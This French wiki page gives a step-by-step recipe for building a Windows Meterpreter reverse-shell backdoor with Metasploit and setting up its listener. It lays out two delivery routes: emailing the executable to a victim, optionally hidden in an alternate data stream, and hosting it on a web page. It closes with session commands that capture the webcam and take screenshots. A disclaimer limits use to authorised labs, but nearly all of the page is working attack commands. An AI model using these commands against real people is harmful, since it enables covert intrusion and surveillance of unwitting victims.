Creation backdoor

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Génération de backdoor
Payload windows/meterpreter/reverse_tcp
Contexte Metasploit
Voir aussi Msfpayload · Meterpreter

Génération d'une porte dérobée meterpreter et mise en écoute du handler correspondant. Deux vecteurs de livraison sont présentés : par courriel et par page web.

1 — Par envoi de courriel

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 X > Desktop/love.exe
msf> use exploit/multi/handler
msf exploit(handler)> set LHOST 192.168.0.10
msf exploit(handler)> exploit -z -j

Envoyer le fichier généré à la victime et attendre qu'elle l'exécute. Le fichier peut être dissimulé dans un flux ADS (Alternate Data Stream) Windows. Une fois la session ouverte :

msf exploit(handler)> sessions -l
sessions -i 3
webcam_list
run webcam -p /var/www

2 — Par page web

Fonctionne sur Windows XP, 7 et 8.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=8080 X > /root/backdoor.exe
msf> use exploit/multi/handler
msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.0.10
msf exploit(handler)> set LPORT 8080
msf exploit(handler)> exploit

Placer le fichier sur une URL web et attendre le téléchargement puis l'exécution. La console signale l'établissement de la connexion :

meterpreter> screenshot

Voir aussi